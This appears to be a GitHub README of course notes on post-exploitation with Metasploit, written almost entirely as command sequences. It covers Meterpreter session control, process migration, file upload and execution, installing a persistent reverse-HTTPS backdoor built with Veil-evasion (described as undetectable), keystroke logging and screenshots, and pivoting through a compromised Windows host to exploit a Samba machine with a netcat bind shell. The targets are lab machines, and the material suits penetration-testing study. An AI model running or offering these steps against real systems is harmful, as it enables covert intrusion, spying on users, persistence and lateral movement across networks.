Skip to content

Latest commit

 

History

History
115 lines (62 loc) · 2.46 KB

README.md

File metadata and controls

115 lines (62 loc) · 2.46 KB

Post Exploitation

  • Assuming that one already has access to the target computer through Metasploit, we can run multiple commands on Meterpreter:
#inside meterpreter session currently

help #shows help manual

background #backgrounds current session

sessions -l #lists all current sessions

sessions -i 4 #to interact with particular session

sysinfo #shows info about target computer

ipconfig #shows all interfaces connected to target computer

ps #shows all running processes

migrate 4376 #migrates meterpreter from current PID (backdoor) to new PID (e.g. - explorer.exe)

pwd #get current working directory

ls #list all files and directories

#cd can be used to switch directories

cat test.txt #read contents of file

download test.txt #download file

upload car-image.exe #upload file

execute -f car-image.exe #execute file

shell #opens Windows Shell to run Windows commands
  • Using metasploit and veil-evasion together is proven to be more robust and undetectable:
#inside metasploit currently

use exploit/windows/local/persistence #to use persistence module

show options

set EXE_NAME browser.exe

set SESSION 4

show advanced #advanced options

set EXE::Custom /var/www/html/evil-files/rev_https_8080.exe

exploit

#the resource file given can be used to clean up, if you do not want to run the backdoor file anymore

sessions -K #kills all sessions

use exploit/multi/handler #listen for incoming connections

show options

exploit #this will work now even if target computer is restarted, because the backdoor has been injected into it
  • Spying on target computer:
#inside meterpreter session currently

keyscan_start #start module to capture keystrokes

keyscan_dump #shows log of keystrokes

keyscan_stop #stop sniffer

screenshot #takes a snap
  • Pivoting can be used as a technique to use the device that we hacked, in order to hack more devices that only this device has access to:
#inside Metasploit currently, with a Windows machine hacked

background #background current Windows session

use post/multi/manage/autoroute #autoroute module for pivoting

show options

set SESSION 1 #Windows session ID is 1

set SUBNET 10.20.15.0 #subnet for Metasploitable machine, which is connected to Windows but not Kali

exploit #creates route

use exploit exploit/multi/samba/usermap_script #exploit for Metasploitable

show options

set RHOSTS 10.0.2.5

show payloads

set PAYLOAD cmd/unix/bind_netcat

exploit #to access Metasploitable